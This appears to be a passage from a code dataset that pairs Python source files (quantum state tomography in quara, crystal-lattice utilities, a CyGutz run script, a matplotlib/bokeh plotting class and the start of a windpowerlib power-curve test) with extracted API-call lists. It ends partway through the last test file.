code (string, lengths 31–1.05M) | apis (list) | extract_api (string, lengths 97–1.91M)
---|---|---|
import itertools
from typing import List, Tuple, Union
import numpy as np
from quara.objects.state import State
from quara.objects.povm import Povm
from quara.objects.qoperation import QOperation
from quara.objects.qoperations import SetQOperations
from quara.protocol.qtomography.standard.standard_qtomography import StandardQTomography
from quara.qcircuit.experiment import Experiment
from quara.utils.number_util import to_stream
class StandardQst(StandardQTomography):
_estimated_qoperation_type = State
def __init__(
self,
povms: List[Povm],
is_physicality_required: bool = False,
is_estimation_object: bool = False,
on_para_eq_constraint: bool = False,
eps_proj_physical: float = None,
eps_truncate_imaginary_part: float = None,
seed_data: int = None,
schedules: Union[str, List[List[Tuple]]] = "all",
):
"""Constructor
Parameters
----------
povms : List[Povm]
testers of QST.
is_physicality_required : bool, optional
whether the QOperation is required to be physical, by default False
is_estimation_object : bool, optional
whether the QOperation is an estimation object, by default False
on_para_eq_constraint : bool, optional
whether the parameters of the QOperation are subject to the equality constraint, by default False
eps_proj_physical : float, optional
threshold epsilon; the projection is repeated until the estimated object is physical, by default :func:`~quara.settings.Settings.get_atol` / 10.0
eps_truncate_imaginary_part : float, optional
threshold to truncate the imaginary part, by default :func:`~quara.settings.Settings.get_atol`
seed_data : int, optional
a seed used to generate random data, by default None.
Raises
------
ValueError
the experiment is not valid.
"""
# create Experiment
if type(schedules) == str:
self._validate_schedules_str(schedules)
if schedules == "all":
schedules = [[("state", 0), ("povm", i)] for i in range(len(povms))]
experiment = Experiment(
states=[None],
gates=[],
povms=povms,
schedules=schedules,
seed_data=seed_data,
)
self._validate_schedules(schedules)
# create SetQOperations
state = State(
povms[0]._composite_system,
np.zeros(povms[0].vecs[0].shape, dtype=np.float64),
is_physicality_required=is_physicality_required,
is_estimation_object=is_estimation_object,
on_para_eq_constraint=on_para_eq_constraint,
eps_proj_physical=eps_proj_physical,
eps_truncate_imaginary_part=eps_truncate_imaginary_part,
)
set_qoperations = SetQOperations(states=[state], gates=[], povms=[])
# initialize super class
super().__init__(experiment, set_qoperations)
# validate
if not self.is_valid_experiment():
raise ValueError(
"the experiment is not valid. all CompositeSystem of testers must have same ElementalSystems."
)
# calc num_variables
if on_para_eq_constraint:
self._num_variables = state.dim ** 2 - 1
else:
self._num_variables = state.dim ** 2
# create map
self._map_experiment_to_setqoperations = {("state", 0): ("state", 0)}
self._map_setqoperations_to_experiment = {("state", 0): ("state", 0)}
# calc and set coeff0s, coeff1s, matA and vecB
self._set_coeffs(experiment, on_para_eq_constraint, state.dim)
self._on_para_eq_constraint = on_para_eq_constraint
self._template_qoperation = self._set_qoperations.states[0]
def _validate_schedules(self, schedules):
for i, schedule in enumerate(schedules):
if schedule[0][0] != "state" or schedule[1][0] != "povm":
message = f"schedules[{i}] is invalid. "
message += 'Schedule of Qst must be in the format \'[("state", 0), ("povm", povm_index)]\', '
message += f"not '{schedule}'."
raise ValueError(message)
if schedule[0][1] != 0:
message = f"schedules[{i}] is invalid."
message += f"State index of schedule in Qst must be 0: {schedule}"
raise ValueError(message)
@property
def on_para_eq_constraint(self): # read only
return self._on_para_eq_constraint
def estimation_object_type(self) -> type:
return State
def _set_coeffs(
self, experiment: Experiment, on_para_eq_constraint: bool, dim: int
):
# coeff0s and coeff1s
self._coeffs_0th = dict()
self._coeffs_1st = dict()
tmp_coeffs_0th = []
tmp_coeffs_1st = []
for schedule_index, schedule in enumerate(self._experiment.schedules):
povm_index = schedule[-1][1]
povm = self._experiment.povms[povm_index]
for element_index, vec in enumerate(povm.vecs):
if on_para_eq_constraint:
self._coeffs_0th[(schedule_index, element_index)] = vec[
0
] / np.sqrt(dim)
self._coeffs_1st[(schedule_index, element_index)] = vec[1:]
tmp_coeffs_0th.append(vec[0])
tmp_coeffs_1st.append(vec[1:])
else:
self._coeffs_0th[(schedule_index, element_index)] = 0
self._coeffs_1st[(schedule_index, element_index)] = vec
tmp_coeffs_0th.append(0)
tmp_coeffs_1st.append(vec)
def is_valid_experiment(self) -> bool:
"""returns whether the experiment is valid.
if all of the following conditions are ``True``, the experiment is valid:
- all povms have the same CompositeSystem.
Returns
-------
bool
whether the experiment is valid.
"""
is_ok_povms = self.is_all_same_composite_systems(self._experiment.povms)
return is_ok_povms
def _testers(self) -> List[Povm]:
return self.experiment.povms
def _get_target_index(self, experiment: Experiment, schedule_index: int) -> int:
schedule = experiment.schedules[schedule_index]
state_index = schedule[0][1]
return state_index
def generate_dataset(self, data_nums: List[int]) -> List[List[np.ndarray]]:
"""calculates a probability distribution.
see :func:`~quara.protocol.qtomography.qtomography.QTomography.generate_dataset`
"""
raise NotImplementedError()
def generate_empi_dist(
self,
schedule_index: int,
state: State,
num_sum: int,
seed_or_generator: Union[int, np.random.Generator] = None,
) -> Tuple[int, np.ndarray]:
"""Generate empirical distribution using the data generated from probability distribution of specified schedules.
Parameters
----------
schedule_index : int
schedule index.
state : State
true object.
num_sum : int
the number of data points used to generate the empirical distribution for the schedule.
seed_or_generator : Union[int, np.random.Generator], optional
If the type is int, it is assumed to be a seed used to generate random data.
If the type is Generator, it is used to generate random data.
If argument is None, np.random is used to generate random data.
Default value is None.
Returns
-------
Tuple[int, np.ndarray]
Generated empirical distribution.
"""
tmp_experiment = self._experiment.copy()
state_index = self._get_target_index(tmp_experiment, schedule_index)
tmp_experiment.states[state_index] = state
stream = to_stream(seed_or_generator)
empi_dist_seq = tmp_experiment.generate_empi_dist_sequence(
schedule_index, [num_sum], seed_or_generator=stream
)
return empi_dist_seq[0]
def generate_empi_dists(
self,
state: State,
num_sum: int,
seed_or_generator: Union[int, np.random.Generator] = None,
) -> List[Tuple[int, np.ndarray]]:
"""Generate empirical distributions using the data generated from probability distributions of all schedules.
see :func:`~quara.protocol.qtomography.qtomography.QTomography.generate_empi_dists`
"""
tmp_experiment = self._experiment.copy()
for schedule_index in range(len(tmp_experiment.schedules)):
state_index = self._get_target_index(tmp_experiment, schedule_index)
tmp_experiment.states[state_index] = state
num_sums = [num_sum] * self._num_schedules
stream = to_stream(seed_or_generator)
empi_dist_seq = tmp_experiment.generate_empi_dists_sequence(
[num_sums], seed_or_generator=stream
)
empi_dists = list(itertools.chain.from_iterable(empi_dist_seq))
return empi_dists
def generate_empi_dists_sequence(
self,
state: State,
num_sums: List[int],
seed_or_generator: Union[int, np.random.Generator] = None,
) -> List[List[Tuple[int, np.ndarray]]]:
"""Generate sequence of empirical distributions using the data generated from probability distributions of all schedules.
Parameters
----------
state : State
true object.
num_sums : List[int]
list of the numbers of data points used to generate the empirical distributions for each schedule.
seed_or_generator : Union[int, np.random.Generator], optional
If the type is int, it is assumed to be a seed used to generate random data.
If the type is Generator, it is used to generate random data.
If argument is None, np.random is used to generate random data.
Default value is None.
Returns
-------
List[List[Tuple[int, np.ndarray]]]
sequence of lists of tuples of the number of data points and the empirical distribution for each schedule.
"""
tmp_experiment = self._experiment.copy()
list_num_sums = [num_sums] * self._num_schedules
list_num_sums_tmp = [list(num_sums) for num_sums in zip(*list_num_sums)]
for schedule_index in range(len(tmp_experiment.schedules)):
state_index = self._get_target_index(tmp_experiment, schedule_index)
tmp_experiment.states[state_index] = state
stream = to_stream(seed_or_generator)
empi_dists_sequence_tmp = tmp_experiment.generate_empi_dists_sequence(
list_num_sums_tmp, seed_or_generator=stream
)
empi_dists_sequence = [
list(empi_dists) for empi_dists in zip(*empi_dists_sequence_tmp)
]
return empi_dists_sequence
def convert_var_to_qoperation(self, var: np.ndarray) -> State:
"""converts variable to QOperation.
see :func:`~quara.protocol.qtomography.standard.standard_qtomography.StandardQTomography.convert_var_to_qoperation`
"""
template = self._template_qoperation
state = template.generate_from_var(var=var)
return state
def generate_empty_estimation_obj_with_setting_info(self) -> QOperation:
"""generates the empty estimation object with setting information.
Returns
-------
QOperation
the empty estimation object (State) with setting information.
"""
empty_estimation_obj = self._set_qoperations.states[0]
return empty_estimation_obj.copy()
def num_outcomes(self, schedule_index: int) -> int:
"""returns the number of outcomes of probability distribution of a schedule index.
Parameters
----------
schedule_index: int
Returns
-------
int
the number of outcomes
"""
assert schedule_index >= 0
assert schedule_index < self.num_schedules
povm_index = self._experiment.schedules[schedule_index][1][1]
return len(self._experiment._povms[povm_index].vecs)
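# Hedged usage sketch (added for illustration, not part of the original module):
# assuming `tester_povms` (List[Povm]) and `true_state` (State) have already been
# built elsewhere on the same CompositeSystem, a QST run might look like:
#
#     qst = StandardQst(tester_povms, on_para_eq_constraint=True, seed_data=7)
#     empi_dists = qst.generate_empi_dists(state=true_state, num_sum=1000)
#     # one (num_sum, relative-frequency ndarray) pair per schedule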
|
[
"numpy.zeros",
"quara.utils.number_util.to_stream",
"quara.qcircuit.experiment.Experiment",
"itertools.chain.from_iterable",
"quara.objects.qoperations.SetQOperations",
"numpy.sqrt"
] |
[((2227, 2321), 'quara.qcircuit.experiment.Experiment', 'Experiment', ([], {'states': '[None]', 'gates': '[]', 'povms': 'povms', 'schedules': 'schedules', 'seed_data': 'seed_data'}), '(states=[None], gates=[], povms=povms, schedules=schedules,\n seed_data=seed_data)\n', (2237, 2321), False, 'from quara.qcircuit.experiment import Experiment\n'), ((2921, 2971), 'quara.objects.qoperations.SetQOperations', 'SetQOperations', ([], {'states': '[state]', 'gates': '[]', 'povms': '[]'}), '(states=[state], gates=[], povms=[])\n', (2935, 2971), False, 'from quara.objects.qoperations import SetQOperations\n'), ((8084, 8112), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (8093, 8112), False, 'from quara.utils.number_util import to_stream\n'), ((9026, 9054), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (9035, 9054), False, 'from quara.utils.number_util import to_stream\n'), ((10803, 10831), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (10812, 10831), False, 'from quara.utils.number_util import to_stream\n'), ((2542, 2592), 'numpy.zeros', 'np.zeros', (['povms[0].vecs[0].shape'], {'dtype': 'np.float64'}), '(povms[0].vecs[0].shape, dtype=np.float64)\n', (2550, 2592), True, 'import numpy as np\n'), ((9210, 9254), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['empi_dist_seq'], {}), '(empi_dist_seq)\n', (9239, 9254), False, 'import itertools\n'), ((5370, 5382), 'numpy.sqrt', 'np.sqrt', (['dim'], {}), '(dim)\n', (5377, 5382), True, 'import numpy as np\n')]
|
import numpy as np
from sys import platform
import os
def get_slash():
if platform == 'win32':
return '\\'
else:
return '/'
def kpoint_segment(first, second, pps):
"""
:param first: first k-point
:param second: second k-point
:param pps: points per segment
:return: normalized (by k-space distance) segment for bands plot
"""
first = np.array(first)
second = np.array(second)
dist = np.linalg.norm(second - first)
segment = np.linspace(0, dist, pps)
return segment
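# Hedged example (illustrative only): consecutive segments can be offset by the
# end of the previous one to build the x-axis of a band-structure plot.
#
#     seg1 = kpoint_segment([0, 0, 0], [0.5, 0, 0], pps=3)      # [0.0, 0.25, 0.5]
#     seg2 = kpoint_segment([0.5, 0, 0], [0.5, 0.5, 0], pps=3)  # [0.0, 0.25, 0.5]
#     x_axis = np.concatenate([seg1, seg1[-1] + seg2])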
def frac2cart(frac_point, lat, twopi=False):
"""
transforms a fractional point to cartesian. by default it assumes that the lattice already has the 2*pi factor included
:param frac_point: fractional coordinate
:param lat: lattice. can be either real space or reciprocal space. should be a matrix where each row is a
lattice vector
:param twopi: determines whether a multiplication by 2*pi is needed
:return: cartesian point
"""
frac_point = np.array(frac_point)
lat = np.array(lat)
for i in range(3):
lat[i] *= frac_point[i]
if twopi:
cart = 2 * np.pi * lat.sum(0)
else:
cart = lat.sum(0)
return cart.tolist()
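# Hedged example (illustrative only): for a simple cubic lattice with lattice
# parameter a = 2.0, the fractional point (0.5, 0.5, 0.5) maps to (1.0, 1.0, 1.0).
#
#     lat = [[2.0, 0.0, 0.0], [0.0, 2.0, 0.0], [0.0, 0.0, 2.0]]
#     frac2cart([0.5, 0.5, 0.5], lat)   # -> [1.0, 1.0, 1.0]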
def smooth(vec, step):
vec2 = np.zeros(len(vec))
for i in range(step - 1, len(vec), step):
vec2[i - (step - 1):i + 1] = vec[i - (step - 1):i + 1].sum() / step
return vec2
def cart2frac(coordinates, lattice):
lattice = np.array(lattice)
coordinates = np.array(coordinates)
if coordinates.shape == (3,):
return np.linalg.solve(lattice.T, coordinates).tolist()
else:
fracs = np.zeros(len(coordinates) * 3).reshape(len(coordinates), 3)
for i, coordinate in enumerate(coordinates):
fracs[i] = np.linalg.solve(lattice.T, coordinate)
return fracs.tolist()
def gauge_fix(vec):
"""
fixes the gauge of a vector or a list of vectors (returns a numpy array)
"""
vec = np.array(vec, dtype=complex)
if type(vec[0]) == np.ndarray:
for i in range(len(vec)):
vec[i] = vec[i] * np.exp(-1j * np.angle(vec[i].sum()))
if vec[i].sum() < 0:
vec[i] = -vec[i]
else:
vec = vec * np.exp(-1j * np.angle(vec.sum()))
if vec.sum() < 0:
vec = -vec
return vec
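# Hedged example (illustrative only): a common complex phase is rotated away so
# that the sum of the returned vector is real and non-negative.
#
#     gauge_fix([1j, 1j])   # -> approximately array([1.+0.j, 1.+0.j])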
def ints2vec(unit_cell, integers):
"""
:param unit_cell:
:param integers: list of 3 integers [n1, n2, n3] such that R = n1a1 + n2a2 + n3a3
:return: a lattice vector as a numpy array
"""
unit_cell = np.array(unit_cell)
integers = np.array(integers)
r = np.zeros(3)
for i in range(3):
r += integers[i] * unit_cell[i]
return np.array(r)
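# Hedged example (illustrative only): for a cubic unit cell with a = 1, the
# integers [1, 2, 0] give the lattice vector R = 1*a1 + 2*a2 + 0*a3.
#
#     ints2vec(np.eye(3), [1, 2, 0])   # -> array([1., 2., 0.])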
|
[
"numpy.zeros",
"numpy.linalg.norm",
"numpy.array",
"numpy.linspace",
"numpy.linalg.solve"
] |
[((390, 405), 'numpy.array', 'np.array', (['first'], {}), '(first)\n', (398, 405), True, 'import numpy as np\n'), ((419, 435), 'numpy.array', 'np.array', (['second'], {}), '(second)\n', (427, 435), True, 'import numpy as np\n'), ((447, 477), 'numpy.linalg.norm', 'np.linalg.norm', (['(second - first)'], {}), '(second - first)\n', (461, 477), True, 'import numpy as np\n'), ((492, 517), 'numpy.linspace', 'np.linspace', (['(0)', 'dist', 'pps'], {}), '(0, dist, pps)\n', (503, 517), True, 'import numpy as np\n'), ((989, 1009), 'numpy.array', 'np.array', (['frac_point'], {}), '(frac_point)\n', (997, 1009), True, 'import numpy as np\n'), ((1020, 1033), 'numpy.array', 'np.array', (['lat'], {}), '(lat)\n', (1028, 1033), True, 'import numpy as np\n'), ((1447, 1464), 'numpy.array', 'np.array', (['lattice'], {}), '(lattice)\n', (1455, 1464), True, 'import numpy as np\n'), ((1483, 1504), 'numpy.array', 'np.array', (['coordinates'], {}), '(coordinates)\n', (1491, 1504), True, 'import numpy as np\n'), ((1954, 1982), 'numpy.array', 'np.array', (['vec'], {'dtype': 'complex'}), '(vec, dtype=complex)\n', (1962, 1982), True, 'import numpy as np\n'), ((2537, 2556), 'numpy.array', 'np.array', (['unit_cell'], {}), '(unit_cell)\n', (2545, 2556), True, 'import numpy as np\n'), ((2572, 2590), 'numpy.array', 'np.array', (['integers'], {}), '(integers)\n', (2580, 2590), True, 'import numpy as np\n'), ((2599, 2610), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (2607, 2610), True, 'import numpy as np\n'), ((2685, 2696), 'numpy.array', 'np.array', (['r'], {}), '(r)\n', (2693, 2696), True, 'import numpy as np\n'), ((1765, 1803), 'numpy.linalg.solve', 'np.linalg.solve', (['lattice.T', 'coordinate'], {}), '(lattice.T, coordinate)\n', (1780, 1803), True, 'import numpy as np\n'), ((1554, 1593), 'numpy.linalg.solve', 'np.linalg.solve', (['lattice.T', 'coordinates'], {}), '(lattice.T, coordinates)\n', (1569, 1593), True, 'import numpy as np\n')]
|
import numpy as np
from pyglib.model import circauxi
import shutil,subprocess
cmd = ['/home/ykent/WIEN_GUTZ/bin2/CyGutz', '-r', '-1']
for i,u in enumerate(np.arange(1.0,0.9,-10)):
print(' Running with u = {}'.format(u))
circauxi.gutz_model_setup(u=u, nmesh=5000, norb=3, tiny=0.0, mu=0.0)
subprocess.call(cmd)
shutil.copyfile('WH_RL_BEST.h5', 'WH_RL_INIT.h5')
shutil.copyfile('WH_RL_BEST.h5', 'WH_RL_INIT.h5_{}'.format(u))
|
[
"pyglib.model.circauxi.gutz_model_setup",
"shutil.copyfile",
"subprocess.call",
"numpy.arange"
] |
[((157, 181), 'numpy.arange', 'np.arange', (['(1.0)', '(0.9)', '(-10)'], {}), '(1.0, 0.9, -10)\n', (166, 181), True, 'import numpy as np\n'), ((230, 298), 'pyglib.model.circauxi.gutz_model_setup', 'circauxi.gutz_model_setup', ([], {'u': 'u', 'nmesh': '(5000)', 'norb': '(3)', 'tiny': '(0.0)', 'mu': '(0.0)'}), '(u=u, nmesh=5000, norb=3, tiny=0.0, mu=0.0)\n', (255, 298), False, 'from pyglib.model import circauxi\n'), ((303, 323), 'subprocess.call', 'subprocess.call', (['cmd'], {}), '(cmd)\n', (318, 323), False, 'import shutil, subprocess\n'), ((328, 377), 'shutil.copyfile', 'shutil.copyfile', (['"""WH_RL_BEST.h5"""', '"""WH_RL_INIT.h5"""'], {}), "('WH_RL_BEST.h5', 'WH_RL_INIT.h5')\n", (343, 377), False, 'import shutil, subprocess\n')]
|
# coding:utf-8
from bokeh.charts import TimeSeries, show, output_file
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import json
from itertools import cycle
## set up the default font and related rcParams here
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['Adobe Heiti Std'] # specify the default font
mpl.rcParams['axes.unicode_minus'] = False # keep the minus sign '-' from rendering as a box in saved figures
mpl.rcParams['savefig.dpi'] = 300
class Visualizer :
def __init__(self, pandas=[]) :
self.pandas = pandas
def scale_axis(self, tuple_range, scale) :
middle = (tuple_range[0] + tuple_range[1]) / 2.0
return (middle + scale* (i - middle) for i in tuple_range)
def data_middle(self, tuple_range, *args, **kwargs) :
a = max(tuple_range)
return (-0.1*a, 1.2*a)
def show_3_variables(self, var_list) :
#self.pandas.plot(x=self.pandas.time);
"""
Red, green and blue styles in turn, each drawn with its own color; the third one mainly serves as a reference line.
The goal is to observe how the first two vary with time relative to each other.
"""
slices = self.pandas[var_list]
fig, ax1 = plt.subplots()
ax2, ax3 = ax1.twinx(), ax1.twinx()
ax1.set_xlabel("simulation time")
ax1.set_ylabel(var_list[0])
ax2.set_ylabel(var_list[1])
ax3.set_ylabel(var_list[2])
rspine = ax3.spines['right']
rspine.set_position(('axes', 1.20))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
fig.subplots_adjust(right=0.75)
## note the trick used below when building the legend
styles = ['r-', 'g-', 'b--']
ax1.plot(slices[var_list[0]], styles[0],label=var_list[0])
ax1.plot(0,0, styles[1],label=var_list[1])
ax1.plot(0,0, styles[2],label=var_list[2])
## note: an axis range $(min, max)$ is rescaled as $(min+max)/2 + k*(x - (min+max)/2)$
print(ax2.get_ylim())
ax2.plot(slices[var_list[1]], styles[1],label=var_list[1])
ax2.set_ylim( self.scale_axis(ax2.get_ylim(),1.2) )
ax3.plot(slices[var_list[2]], styles[2],label=var_list[2])
ax3.set_ylim( self.scale_axis(ax3.get_ylim(),1.4) )
#slices[var_list[1]].plot(ax=ax2, style='r-',label=var_list[0], secondary_y=True)
#slices[var_list[2]].plot(ax=ax3, style='g-',label=var_list[0])
ax1.legend(loc='upper left') ## lower/upper/center left/right
#plt.legend(loc='best')
plt.show()
# d = Pandas Dataframe,
# ys = [ [cols in the same y], [cols in the same y], [cols in the same y], .. ]
# any different y axis <http://stackoverflow.com/questions/7733693/matplotlib-overlay-plots-with-different-scales>
def show_n_vars_on_right(self, var_list_group
, line_styles = cycle(['-','-','-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>',
'1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_'])
, markers = cycle(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_'])
) :
d = self.pandas
ys = var_list_group
#from itertools import cycle
fig, ax = plt.subplots()
axes = [ax]
for y in ys[1:]:
# Twin the x-axis twice to make independent y-axes.
axes.append(ax.twinx())
extra_ys = len(axes[2:])
# Make some space on the right side for the extra y-axes.
if extra_ys>0:
temp = 0.85
if extra_ys<=2:
temp = 0.75
elif extra_ys<=4:
temp = 0.6
if extra_ys>5:
raise Exception('you are being ridiculous, too many axes')
fig.subplots_adjust(right=temp)
right_additive = (0.98-temp)/float(extra_ys)
# Move the last y-axis spine over to the right by x% of the width of the axes
i = 1.
for ax in axes[2:]:
ax.spines['right'].set_position(('axes', 1.+right_additive*i))
ax.set_frame_on(True)
ax.patch.set_visible(False)
ax.yaxis.set_major_formatter(matplotlib.ticker.OldScalarFormatter())
i +=1.
# To make the border of the right-most axis visible, we need to turn the frame
# on. This hides the other plots, however, so we need to turn its fill off.
cols = []
lines = []
#line_styles = cycle(['-','-','-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>',
# '1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_'])
#markers = cycle(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_'])
colors = cycle(matplotlib.rcParams['axes.color_cycle'])
for ax,y in zip(axes,ys):
ls=next(line_styles)
ms=next(markers)
if len(y)==1:
col = y[0]
cols.append(col)
color = next(colors)
lines.append(ax.plot(d[col],linestyle =ls, marker=ms, label = col,color=color))
ax.set_ylabel(col,color=color)
#ax.tick_params(axis='y', colors=color)
ax.spines['right'].set_color(color)
ax.set_ylim( self.data_middle(ax.get_ylim(), 1.2+0.5*np.random.random()) )
else:
for col in y:
color = next(colors)
lines.append(ax.plot(d[col],linestyle =ls,marker=ms, label = col,color=color))
cols.append(col)
ax.set_ylabel(', '.join(y))
ax.set_ylim( self.data_middle(ax.get_ylim(), 1.2+0.5*np.random.random()) )
#ax.tick_params(axis='y')
axes[0].set_xlabel(d.index.name)
lns = lines[0]
for l in lines[1:]:
lns +=l
labs = [l.get_label() for l in lns]
axes[0].legend(lns, labs, loc="upper left")
#axes[0].set_xlabel("simulation time")
#for i in range(0,len(ys[0])) :
axes[0].set_xlabel("simulation time")
plt.show()
def show_n_var_on_left (self, var_list) :
fig, ax = plt.subplots()  # base figure and axis that the twinned axes below hang off
# Twin the x-axis twice to make independent y-axes.
axes = [ax, ax.twinx(), ax.twinx()]
# Make some space on the right side for the extra y-axis.
fig.subplots_adjust(right=0.75)
# Move the last y-axis spine over to the right by 20% of the width of the axes
axes[1].spines['right'].set_position(('axes', -0.25))
axes[2].spines['right'].set_position(('axes', -0.5))
# To make the border of the right-most axis visible, we need to turn the frame
# on. This hides the other plots, however, so we need to turn its fill off.
axes[-1].set_frame_on(True)
axes[-1].patch.set_visible(False)
# And finally we get to plot things...
colors = ('Green', 'Red', 'Blue')
intAxNo = 0
for ax, color in zip(axes, colors):
intAxNo += 1
data = np.random.random(1) * np.random.random(10)
ax.plot(data, marker='o', linestyle='none', color=color)
if (intAxNo > 1):
if (intAxNo == 2):
ax.set_ylabel('%s Thing' % color, color=color, labelpad = -40 )
elif (intAxNo == 3):
ax.set_ylabel('%s Thing' % color, color=color, labelpad = -45 )
ax.get_yaxis().set_tick_params(direction='out')
else:
ax.set_ylabel('%s Thing' % color, color=color, labelpad = +0 )
ax.tick_params(axis='y', colors=color)
axes[0].set_xlabel('X-axis')
plt.show()
def bokeh_show(self) :
df= pd.DataFrame(self.pandas)
df.consumer_payments = df.consumer_payments.cumsum()
df.cost_for_consumer = df.cost_for_consumer.cumsum()
df.plot(x=df.start_time);
#df.to_csv(open("data.csv", 'w'))
obvalues = pd.DataFrame(dict(r_q=df['r_q'],pay=df['consumer_payments'],sf_q=df['sf_q']))
p = TimeSeries(obvalues, legend=True, title="Stocks", ylabel='Stock Prices')
show(p)
def merged_show(self) :
a = []
df= pd.DataFrame(self.pandas)
df.benefit= df.benefit.cumsum()
df.cost_for_customer = df.cost_for_customer.cumsum()
a.append(df.benefit)
#df = pd.DataFrame(a)
#print(a)
df = pd.concat(a, axis=1)
#print(df)
df.plot()
plt.legend(loc='best')
plt.show()
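# Hedged worked example (illustrative only) of the axis rescaling noted above:
# scale_axis keeps the midpoint of the range fixed and stretches each end by the
# given factor, e.g. 5.0 + 1.2 * (0.0 - 5.0) = -1.0 and 5.0 + 1.2 * (10.0 - 5.0) = 11.0.
#
#     tuple(Visualizer().scale_axis((0.0, 10.0), 1.2))   # -> (-1.0, 11.0)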
|
[
"pandas.DataFrame",
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"bokeh.charts.show",
"numpy.random.random",
"matplotlib.ticker.OldScalarFormatter",
"itertools.cycle",
"matplotlib.pyplot.subplots",
"pandas.concat"
] |
[((1024, 1038), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (1036, 1038), True, 'import matplotlib.pyplot as plt\n'), ((2288, 2298), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2296, 2298), True, 'import matplotlib.pyplot as plt\n'), ((2611, 2764), 'itertools.cycle', 'cycle', (["['-', '-', '-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>', '1',\n '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_']"], {}), "(['-', '-', '-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>',\n '1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_'])\n", (2616, 2764), False, 'from itertools import cycle\n'), ((2802, 2938), 'itertools.cycle', 'cycle', (["['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P',\n '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_']"], {}), "(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p',\n 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_'])\n", (2807, 2938), False, 'from itertools import cycle\n'), ((3059, 3073), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3071, 3073), True, 'import matplotlib.pyplot as plt\n'), ((4632, 4678), 'itertools.cycle', 'cycle', (["matplotlib.rcParams['axes.color_cycle']"], {}), "(matplotlib.rcParams['axes.color_cycle'])\n", (4637, 4678), False, 'from itertools import cycle\n'), ((5993, 6003), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6001, 6003), True, 'import matplotlib.pyplot as plt\n'), ((7624, 7634), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7632, 7634), True, 'import matplotlib.pyplot as plt\n'), ((7677, 7702), 'pandas.DataFrame', 'pd.DataFrame', (['self.pandas'], {}), '(self.pandas)\n', (7689, 7702), True, 'import pandas as pd\n'), ((8094, 8101), 'bokeh.charts.show', 'show', (['p'], {}), '(p)\n', (8098, 8101), False, 'from bokeh.charts import TimeSeries, show, output_file\n'), ((8161, 8186), 'pandas.DataFrame', 'pd.DataFrame', (['self.pandas'], {}), '(self.pandas)\n', (8173, 8186), True, 'import pandas as pd\n'), ((8378, 8398), 'pandas.concat', 'pd.concat', (['a'], {'axis': '(1)'}), '(a, axis=1)\n', (8387, 8398), True, 'import pandas as pd\n'), ((8444, 8466), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (8454, 8466), True, 'import matplotlib.pyplot as plt\n'), ((8475, 8485), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8483, 8485), True, 'import matplotlib.pyplot as plt\n'), ((4004, 4042), 'matplotlib.ticker.OldScalarFormatter', 'matplotlib.ticker.OldScalarFormatter', ([], {}), '()\n', (4040, 4042), False, 'import matplotlib\n'), ((6958, 6977), 'numpy.random.random', 'np.random.random', (['(1)'], {}), '(1)\n', (6974, 6977), True, 'import numpy as np\n'), ((6980, 7000), 'numpy.random.random', 'np.random.random', (['(10)'], {}), '(10)\n', (6996, 7000), True, 'import numpy as np\n'), ((5218, 5236), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (5234, 5236), True, 'import numpy as np\n'), ((5578, 5596), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (5594, 5596), True, 'import numpy as np\n')]
|
"""
SPDX-FileCopyrightText: 2019 oemof developer group <<EMAIL>>
SPDX-License-Identifier: MIT
"""
import pandas as pd
import numpy as np
import pytest
from pandas.util.testing import assert_frame_equal
from windpowerlib.power_curves import (smooth_power_curve,
wake_losses_to_power_curve)
import windpowerlib.wind_turbine as wt
class TestPowerCurves:
@classmethod
def setup_class(self):
self.test_turbine = {'hub_height': 100,
'turbine_type': 'E-126/4200'}
def test_smooth_power_curve(self):
test_curve = wt.WindTurbine(**self.test_turbine).power_curve
parameters = {'power_curve_wind_speeds': test_curve['wind_speed'],
'power_curve_values': test_curve['value'],
'standard_deviation_method': 'turbulence_intensity'}
# Raise ValueError - `turbulence_intensity` missing
with pytest.raises(ValueError):
parameters['standard_deviation_method'] = 'turbulence_intensity'
smooth_power_curve(**parameters)
# Test turbulence_intensity method
parameters['turbulence_intensity'] = 0.5
wind_speed_values_exp = pd.Series([6.0, 7.0, 8.0, 9.0, 10.0],
name='wind_speed')
power_values_exp = pd.Series([
1141906.9806766496, 1577536.8085282773, 1975480.993355767,
